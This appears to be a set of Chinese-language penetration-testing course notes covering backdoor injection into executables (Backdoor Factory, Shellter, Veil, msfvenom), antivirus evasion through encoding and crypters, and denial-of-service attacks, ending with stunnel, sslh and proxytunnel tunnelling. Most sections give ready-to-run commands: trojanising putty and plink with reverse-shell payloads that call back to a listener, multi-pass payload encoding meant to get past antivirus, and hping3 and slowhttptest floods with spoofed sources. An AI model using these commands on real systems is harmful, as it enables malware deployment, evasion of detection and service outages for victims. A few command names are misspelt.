Backdoor-factory

Python语言编写

Patch

    通过替换EXE、DLL、注册表的方法修复系统漏洞或问题的方法

BDF

    向二进制文件中增加或者删除代码内容，某些受保护的二进制程序无法patch，存在一定概率文件会损坏

后门工厂

    适用于windows PE x32/x64 和 linux ELF x32/x64 mac os  os x

   支持msf payload、自定义的payload

其他的是在后边加一段代码，BDF是在现有的代码段之间找缝隙，在缝隙里存放代码，也可以在后面加。

msf使用的patch方法

覆盖程序入口，直接生成的exe执行程序是覆盖了程序入口

msfvenom -p windows/shell/reverse_tcp ......

创建新的线程执行shellcode并跳到原程序入口

增加代码片段跳转执行后跳回原程序的入口

msfvenom -p windows/shell/reverse_tcp –k

CTP方法

新增新的代码段section，与msf的-k方法类似

使用现有的代码裂缝/洞（code cave）存放shellcode

代码洞

二进制文件中超过两个字节的连续的x00区域（代码片段间的区域）

用多个小的代码洞，结合跳转机制，免杀效果更好

根据统计判断，代码洞是编译器在进行编译时造成的，不同的编译器造成的代码洞的大小不同

单个代码洞大小不足以存放完整的shellcode

多代码洞跳转，初期免杀百分百

当洞不够用的时候，结合msf的stager方法

    先插入一段调用下一阶段代码的代码

patch选项

    附加代码段 -a

    单代码洞注入

    多代码洞注入

BDF基本使用

    检查二进制文件是否支持注入

    backdoor-factory -f putty.exe –S

    -f 指定要注入的正常文件

    -S 检测是否能够注入

    查看cave的大小

    ackdoor-factory -f putty.exe -c -l

    显示可用的payload

    backdoor-factory -f putty.exe -s show

    老师常用的

    iat_reverse_tcp_stager_threaded

单代码洞注入

    backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666

多代码洞注入

    backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -H 1.1.1.1 -P 6666 –J

在二进制程序后添加shellcode

    backdoor-factory -f putty.exe -s iat_reverse_tcp_stager_threaded -a -H
192.168.20.8 -P 6666

 -H 连的目标

 -P 连的端口

启动msf侦听

use exploit/multi/handler

可以与veil-evasion集成使用

IAT(import address table)

      指针指向WinAPI地址，被成为thunks（形实转换程序），地址预定义，所以克服了寻找shellcode的麻烦

另一种免杀思路

传统防病毒查杀原理

    查找匹配的特殊字符串，匹配就杀

找到触发AV查杀的精确字符串，将其修改

    将程序分段，将包含MZ头的第一片段与后续片段一次组合后交给AV查杀，重复以上步骤，最终精确定位出

切片的工具windows下的Evade  

linux用wine调用也可以

hexeditor字符界面的二进制编辑工具

ghex图形化的二进制编辑工具

shellter做免杀

代码混淆

定制的编码方式

多态编码

集成部分msf pay load

目前只支持32位PE程序

使用正常exe文件为模板，将payload注入，模板程序将失效

运行模式

auto 自动，需要做的事少   manual 手动，相反

注入后文件大小没有变化

Veil-catapult

payload的投递

集成veil-evasion生成免杀payload或自定义payload

利用类似smbexec的工具原理，利用smb直接执行，不保存

使用Impacket上传二进制payload文件

必须知道目标的帐号，有权限写入文件的帐号

使用 passing-the-hash 触发执行payload

payload直接在内存中运行

power shell inject

     先上传一个power shell

     再上传一个反弹shell

     再用power shell调用反弹shell

修改配置文件，自动启动msfconsole侦听

       /etc/veil/settings.py

      带有powershell的环境，win7以上

Barebones python injector

     原理类似，这个是利用一个python脚本

     不一定目标要有python

 Sethc backdoor

     Sethc本身是windows的一个辅助工具

     快速按五次shift触发，便执行Sethc

     远程传递，用cmd.exe替换Sethc.exek

     在windows/system32下

Execute custom command

     执行一个指定命令

EXE delivery

     指定一个exe文件来投放

msf先进加密技术（多态），运行同样的命令每一次生成的特征码都不一样

Veil-evasion

属于Veil-framework框架的一部分

python编写，集成了msfpayload，支持自定义的payload，多种注入技术，集成第三方工具

无文件病毒，在内存中，还有往固件里写的

集成了各种开发打包运行环境

python：pyinstaller/py2exe

c#：mono for .NET

C：mingw32

list 查看可用的payload

Virtual函数注入

兼容msf，veil生成后门之后会有配置文件生成，msf调用，则开始准备接受shell

sessions 查看有哪些后门连接过来

msfvenom

strings命令，查看执行程序可读字符串

生成shell

msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 --
platform win -f exe -o a.exe

-p payload

lhost 侦听地址

lport 侦听地址

-a 操作系统架构

--platform 运行平台

-f format 输出的格式

-o

加密编码shell

msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e
x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/
countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/
shikata_ga_nai -i 9 -b '\x00' -f exe -o a.exe

-f raw 原始格式

-e encode 加密编码

-i 加密几次

-b 过滤特殊字符

利用模板隐藏shell

plink是putty的字符界面工具

msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

-x 指定一个模板

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/
plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 --
platform win -f exe > b.exe

软件保护

软件开发商为保护版权，采用的混淆加密技术避免盗版逆向，常被用于免杀

Hyperion（32bit PE程序加密器）

内部软件架构

Crypter/Container

下载源代码，编译后使用

编译

cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe

安装wine32

dpkg --add-architecture i386 && apt-get update && apt-get install wine32

自己编写后门

01:35:00

恶意软件逃避安全软件检查的技术

防病毒软件

恶意程序最主要的防护手段

    杀毒软件/防病毒软件

    客户端/服务器/邮件防病毒

检测原理

    基于二进制文件中特征签名的黑名单检测方法

    基于行为的分析方法（启发式）

事后手段

    永远落后于病毒发展

免杀技术

    修改二进制文件中的特征字符

       替换、擦除、修改

   加密技术（crypter）

       通过加密使得特征字符不可读，从而逃避AV检测

       运行时分片分段的解密执行，注入进程或AV不检查的无害文件（txt、mp3、jpg、pdf）中 

   防病毒软件的检测

       加密之后恶意程序本身的特征字符无法被检测出，转而检查加密器crypter的特征字符

当前现状

恶意软件制造者

     编写私有RAT，避免普遍被AV所知的特征字符

     使用独有crypter软件加密恶意程序

     处事低调、尽量避免被发现

     没有能力自己编写恶意代码的黑客，通过直接修改特征码的方式免杀

     Fully UnDetectable（全免杀）是最高追求（FUD）

AV厂商

   广泛采集样本，更新病毒库

   一般新的恶意软件安全UD窗口期是一周左右

   与恶意软件制造者永无休止的拉锯战

   新的启发式检测技术尚有待完善（误杀漏杀）

 单一AV厂商的病毒库很难达到百分百覆盖

同时提供多种AV的在线扫描与AV厂家共享信息

   https://www.virustotal.com/ #有的国家的AV软件直接调用它的API，软件厂家本身并没有病毒库 

   http://www.virscan.org/  

搞黑的在线多引擎查毒站

   https://nodistribute.com/
   http://viruscheckmate.com/check/ 

常用RAT软件

  灰鸽子、波尔、黑暗彗星、潘多拉、namocore

Nmap

利用其DoS脚本

/usr/share/nmap/scirpt.db中有脚本信息

匿名者拒绝服务工具包

windows下

LOIC，HOIC暴力消耗资源

DDoSer 原理是slow HTTP post 攻击

以上DoS工具不隐藏真实IP地址

XOIC

有恶意代码

攻击任意IP地址的制定端口

支持三种模式：text，normal，DoS Attack

支持协议：TCP/HTTP/UDP/ICMP

HULK（Http Unbearrble Load King）

python脚本

随机产生大量唯一的地址请求，避免缓存命中

耗尽WEB服务器资源池

乱发送请求，请求一些随机值，不存在的值，不存在的目录，防止缓存命中，来消耗资源

DDoSIM

7层拒绝服务工具

随机IP地址

基于TCP连接的攻击

应用层DDoS攻击

SMTP DDoS

正常的HTTP请求、非正常的HTTP请求式DDoS

随机端口的TCP连接洪水

GoldenEye

http/https 拒绝服务攻击工具

安全研究为目的的python

随机攻击向量，keep-alive

可以模拟多个人向目标攻击，每个人的并发连接数也可以设置

RUDY（ARE YOU DEAD YET）

慢速应用层HTTP POST攻击，与slowhttptest原理相同

每次只传输一个字节的数据（很极致）

攻击有表单WEB页面，攻击时需要指定攻击的参数名称

Hping3

几乎可以定制发送任何TCP/IP数据包，用于测试FW、端口扫描、性能测试

Syn Flood攻击

攻击者消耗大量资源

   hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 1.1.1.1
   hping3 -S -P -U -p 80 --flood --rand-source 1.1.1.1

TCP Flood攻击

拼资源

   hping3 -SARFUP -p 80 --flood --rand-source 1.1.1.1 （）

-c count计数

-d data数据段多大

-S 发的是TCP的flag位是SYN

-w window的大小，默认64

-p 目标端口

--flood 以flood的方式发

--rand-source 随机伪造源地址

-P flag位为PUSH

-U flag位为URG

-SARFUP flag位很多

ICMP Flood攻击

   hping3 -q -n -a 1.1.1.1 --icmp -d 56 --flood 1.1.1.2

-q 安静模式

-n 不解析域名

-a 伪造源地址为

UDP Flood攻击

hping3 -a 1.1.1.1 --udp -s 53 -d 100 -p 53 --flood 1.1.1.2

LAND攻击

  特殊种类的SYN Flood攻击

  源地址、目的地址都是受害者、表示受害者自己完成三次握手，左右互搏自己打自己

   hping3 -n -a 1.1.1.1 -S -d 100 -p 80 --flood 1.1.1.1 

windows会打的很慢。unix可能会挂。

TCP全链接DoS攻击

nping 包含在nmap软件包里

   nping --tcp-connect --rate=10000 -c 1000000000 -q 1.1.1.1

查公网IP

   nping --echo-client "public" echo.nmap.org --udp

Siege

   http/https压力测试工具，模拟多个用户并发访问请求

扫描banner（也可以不写http/https）

   siege -g http://1.1.1.1/a.php

DoS

siege -i -c 1000 网址 -A 任意字符

-c 连接数

-A 指定user-agent，默认会带一个siege字符

-i 模拟用户随机点击

同时访问多个URL

默认的/usr/siege/urls.txt

通过 -f 来调用

T50 网络压力测试

  t50 1.1.1.1 --flood --turbo -S --protocol TCP --dport 80
  t50 1.1.1.1 --flood --turbo -S TCP UDP OSPF EIGRP --dport 22

应用层DoS

服务代码存在漏洞，遇到异常提交数据时程序崩溃

应用处理大量并发请求能力有限，被拒绝的是应用或OS

缓冲区溢出 模糊测试

CesarFTP 0.99

Ms12-020 远程桌面协议DoS

Slowhttptest工具（源自google）

收录了4种攻击方法

低带宽应用层慢速DoS攻击（相比于CC等快速攻击而言的慢速）

最早由python，跨平台，貌似用c重写了

尤其擅长攻击apache，tomcat，消耗应用的连接池

如果没有用反向代理的话，一打就死，几乎百发百中

攻击方法

Slowloris，Slow HTTP POST攻击

   耗尽应用的并发连接池，类似于Http层的Syn flood

   HTTP协议默认在服务器全部接受请求之后才开始处理，若客户端发送速度缓慢或不完整，服务器时钟为其保留连接池占用，此类大量并发导致DoS

   Slowloris：完整的http请求结尾是\r\n\r\n,攻击发\r\n......

   Slow POST：HTTP头表明长度，但body部分缓慢发送

Slow Read attack攻击

   与sloworis and slow POST目的相同，都是耗尽应用并发链接池

   不同之处在于请求正常发送，但慢速读取响应数据

   攻击者调整TCP window窗口大小，是服务器慢速返回数据

Apache Range header attack攻击

   针对apache

   客户端传输大文件时，体积超过HTTP Body大小限制时进行分段，耗尽服务器的CPU内存资源

查看系统资源分配

     ulimit -a

HTTP Post 攻击模式

slowhttptest -c 1000 -B -g -o body_stats -i 110 -r 200 -s 8192 -t FAKEVERB
-u http://1.1.1.1 -x 10 -p 3

Slowloris攻击

slowhttptest -c 1000 -H -g -o header_stats -i 10 -r 200 -t GET -u http://1.1.1.1 -x 24 -p 3

apache range header attack攻击

slowhttptest -R -u http://host.example.com/ -t HEAD -c 1000 -a 10  -b 3000 -r 500

slow read attack攻击

slowhttptest -c 8000 -X -r 200 -w 512 -y 1024 -n 5 -z 32 -k 3 -u https://host.example.com/resources/index.html -p 3

-c 建立的链接数

-H slowloris攻击方式

-t 使用什么方法

-u 攻击的URL

-p 多少秒不响应则认为目标DoS

-r 每秒连接并发几个

-l 制定攻击时间

支持代理

大量应用服务器和安全设备都无法防护慢速攻击

还有一类拒绝服务攻击

炸邮件，使用垃圾邮件塞满邮箱

无意识/非故意的拒绝服务攻击

数据库服务器宕机恢复后，引用队列大量请求洪水涌来

告警邮件在邮件服务器修改地址够洪水攻击防火墙

NTP放大攻击

网络时间协议（Network Time Protocol）

保证网络设备时间同步

电子设备互相干扰导致时钟差异越来越大

影响应用正常运行（证书服务），日志审计不可信

服务端口UDP 123

攻击原理

NTP服务提供monlist（MON_GETLIST）查询功能，监控NTP服务器的状况

客户端查询时，NTP服务器返回最好同步时间的600个客户端IP，每6个IP一个数据包，最多100个数据包（放大约100倍）

发现NTP服务

nmap -sU -123 1.1.1.1

发现漏洞

ntpdc -n -c monlist 1.1.1.1

-n 不解析

-c command（命令）

ntpq -c rv 1.1.1.1 #查配置信息

ntpdc -c sysinfo 192.168.20.5 #查系统信息

开启NTP，monlist查询

/etc/ntp.conf
    restrict -4 default kod nomodify notrap nopeer noquery
    restrict -6 default kod nomodify notrap nopeer noquery

 注释掉这两行禁用

解决对策

升级ntp服务，或者关掉monlist查询功能

SNMP放大攻击

简单网络管理协议

Simple Network Management Protocol

服务端口 UDP 161/162

通常用来监控设备运行状态

被管理的接收访问请求161端口，监控服务器162端口可以设置被管理的定时发回运行信息

管理站（manager/客户端），被管理设备（agent/服务端）

管理信息数据库（MIB）是一个i信息存储库，包含管理代理中的有关配置和性能的数据，按照不同分类，包含分属不同组的多个数据对象

每一个节点都有一个对象识别符（OID）来唯一的标识

IETF定义的标准的MIB库/厂家自定义MIB库

一般的参数都会兼容标准的，厂家自定义的就得用专门的MIB库

攻击原理

请求流量小，查询结果返回流量大

结合伪造源地址实现攻击

Scapy构造攻击数据包

DNS放大攻击

产生大流量的攻击方法

    单机的带宽的优势

    巨大的单击数量形成的流量汇聚

    利用协议特性实现放大效果的流量（TCP比较少，UDP协议族里多）

DNS协议放大效果

    查询请求流量小，但响应流量可能非常巨大

    dig ANY hp.com @202.106.0.20（流量放大约8倍）

攻击原理

     伪造源地址为被攻击目标，向递归域名查询服务器发起查询

     DNS服务器成为流量放大和实施攻击者，大量DNS服务器实现DDoS

Scapy构造攻击数据包

IP/UDP/DNS/DNS查询内容

结合IP地址欺骗，利用大量DNS服务器做傀儡机进行攻击

TearDrop攻击

主要针对早期的微软操作系统（95，98，3.x，nt），近些年有些人发现对2.x版本的android系统，IOS 6.0 系统攻击有效

原理有趣

使用IP分段偏移值实现分段覆盖，接受端处理分段覆盖是可被拒绝服务

MAC头（14个字节，目的地和源地址MAC各3个，协议类型2个字节），FCS（4个字节）差错校验属于二层协议，其之间的成为二层的payload

IP最小一般20个字节

Smurf攻击

十分古老的DDoS攻击技术

    对现代操作系统几乎无效（大部分不响应目标为广播的ping）

    只在局域网里

    向广播地址发送ICMP echo Request（ping）包，伪造源地址，由于响应太多所以，造成伪造的地址拒绝服务

Scapy

     i=IP()

     i.src="1.1.1.2"

     i.dst="1.1.1.255"

     p=ICMP()

     r=send(i/p)

一行Scapy

send(IP(dst="1.1.1.255",src="1.1.1.2")/ICMP(),count=100,verbose=1)

Sockstress攻击

2008年由jack C.Louis发现

针对TCP服务的拒绝服务攻击

     消耗目标操作系统资源

     与目标建立大量socket链接

     攻击者消耗资源小（CPU，内存，带宽）

     异步攻击，单机可拒绝服务高配资源服务器，建立的链接都需要用资源的处理

     完成三次握手，最后的ACK包window大小为0（客户端不接收数据）

     Window窗口实现的TCP流控与可靠传输

添加防火墙规则

iptables -A OUTPUT -p TCP --tcp-flags rst rst -d 1.1.1.1 -j DROP

防御措施

直到今天sockstress攻击仍然是一种很有效的DoS攻击方式

由于建立完整的TCP三步握手，因此使用syn cookie防御无效

根本的防御方式是采取白名单（不实际）

折中对策：限制单位时间内每IP建TCP连接数

封杀每30秒与80端口建立的链接超过10的地址

   iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --set
   iptables -I INPUT -p tcp --dport 80 -m state --state NEW -m recent --update --
seconds 30 --hitcount 10 -j DROP

只对单个ip有效，但是对DDoS无效

Syn-Flood

协议上所谓的连接，不同与物理意义连接，且中间的路由设备上并没有链接状态的记录，只负责转发，只是一个客户端和服务端的约定，无法确定确定被收到。

占用的最大TCP连接数，不是内存和CPU资源

各系统最大TCP连接数不一样

Scapy
     i=IP() #造IP包头
     i.dst=“1.1.1.1” #，目标地址
     i.display() #显示 IP 包头
     t=TCP() # 造TCP包头

     t.dport=22 #目标端口
     sr1(i/t,verbose=1,timeout=3) #发送数据包

     sr1(IP(dst=1.1.1.1)/TCP())

让系统不发RST包

iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 1.1.1.1 -j DROP

统计tcp链接数量

netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'

metasploittable2默认最大半连接256个

windowsXP默认最大并发连接数10个

TCP通信过程中的连接状态

建立连接三次握手

断开连接发起双方都可以发起

断开连接多次握手

重传机制，重发请求，在一定等待时间之内

IP地址欺骗

大部分拒绝服务攻击常伴随IP地址欺骗

单一源地址太容易处理

经常用于DoS攻击

根据IP头地址寻址，伪造IP源地址

但是边界路由器过滤，入站，出站

受害者可能是源目的地址

绕过基于地址的验证

压力测试模拟多用户

防IP地址欺骗，根据上层协议（TCP序列号），很难预判

TCP链路劫持

目前应该有所突破

拒绝服务

互联网最后的痛点

DoS不是DOS

利用程序漏洞资源耗尽或一对一资源耗尽的Denial of Service （服务被拒绝）

DDoS分布式拒绝服务

多对一资源消耗

专业化攻击方式，难以防御

黑洞技术

最终的办法就是拼资源，投资抗D，或者乖乖交保护费

云盾防一层

多服务器广域网负载均衡

本地流量清洗

DoS分类

D网络

基于巨量的Flood耗尽目标网络带宽资源

ICMP Flood，UDP Flood

D协议

攻击协议漏洞发起的拒绝服务攻击

Syn Flood（大量半开的连接），Ping of Death，ARP，DNS，802.11无线网络，SSL

D应用

针对应用软件和操作系统发起的拒绝服务攻击

大量频繁访问正常资源消耗系统资源严重的应用（CC）

通常表现为操作系统正常，网络流量不大，但服务停止响应

可以是一击毙命的，也可以是耗尽目标资源的

分类思想可取，但不能过分迷信

为何会被DoS

从攻击者到被害者

击倒宕机

网络——FW——服务器OS——服务应用

资源耗尽

    网络：带宽

    FW：吞吐量，并发连接

    服务器：CPU，内存，IO

    应用：处理请求能力，对OS资源的使用权

程序漏洞攻击

    缓冲区，协议，程序逻辑漏洞

链路上任何一点都可成为目标

拒绝服务，老师个人的分类

瓶颈

程序处理不当：tomcat

物理电气特性极限

stunnel4

无需修改源代码的情况下将TCP流量封装于SSL通道内

适于本身不支持加密传输的应用

支持openssl安全特性

跨平台，性能优

安装内网stunnel服务器

服务端配置

生成证书

  openssl req -new –days 365 -nodes -x509 -out /etc/stunnel/
stunnel.pem -keyout /etc/stunnel/stunnel.pem

cer公钥证书格式

pem包含公钥和私钥

创建配置文件 /etc/stunnel/stunnel.conf

     #要使用的证书文件

     cert = /etc/stunnel/stunnel.pem
     #帐号

     setuid = stunnel4
     setgid = stunnel4
     #pid位置

     pid = /var/run/stunnel4/stunnel4.pid
     #访问到资源

     [mysqls]
     accept = 0.0.0.0:443
     connect = 1.1.1.11:3306

Stunnel4自动启动

/etc/default/stunnel4

   ENABLED=1

启动服务端

service stunnel4 start

客户端配置

配置文件

/etc/stunnel/stunnel.conf

   client = yes
   [mysqls]
   accept = 3306
   connect = 192.168.1.11:443

客户端自启动

/etc/default/stunnel4
    ENABLED=1

启动客户端服务

service stunnel4 stop / start

mysql连接

mysql -u root -h 127.0.0.1

SSLH

与SSL和SSH都相关

基于SSL的工具

相当于一个端口分配器（类似以前的电话线分线器）

根据客户端地一个数据包检测协议类型

根据协议检测结果将流量转发给不同目标

支持HTTP HTTPS SSH OpenVPN tinc XMPP（内建的已经支持了）和其他可以基于正则表达式判断的人和协议类型

支持防火墙允许443入站访问流量环境

让sslh侦听本机公网地址的443端口

让真正的https侦听127.0.0.1:443

或者是别的

安装HTTPS站点

    安装IIS服务，证书服务

    部署HTTPS站点

配置文件

etc/default/ssh

防火墙端口映射

启动

service sslh start

扫描sslh侦听的端口，扫到多个服务

proxytunnle

通过标准的HTTP，HTTPS代理隧道

通过HTTP CONNECT方法封装信息

适用于内网使用代理并且防火墙只允许代理服务器上网的场景，无法创建DNS，ICMP隧道

squid 默认侦听来自所有地址的访问该端口的请求，有安全隐患，应该修改配置，权限最小化

vi 搜索 /^ 以开头的

via 通过哪个机器来个

X-Forwarded-For 从哪个真实的IP来

云端waf原理是将域名解析指向云端waf

云端waf 不仅为了过滤，还为了隐藏服务器ip

创建隧道

proxytunnle -a 80 -p 127.0.0.1:3128 -d 192.168.1.1:80

-p 使用的代理

-d 访问的资源

访问的资源的端口，非防火墙允许的端口，并且有协议过滤的

proxytunnle -a 80 -p 127.0.0.1:3128 -r 192.168.1.1:80 -d 192.168.1.1:22

-r 公网代理

-d 要访问的资源

SSH客户端配置自动创建代理链隧道

提前写好配置文件，先建立隧道再SSH

vi ~/.ssh/config
  Host 192.168.1.1
       Hostname 192.168.1.1
       ProtocolKeepAlives 30
       ProxyCommand /usr/bin/proxytunnel -p 1.1.1.1:3128 -r 192.168.1.1:80 -d %h:%p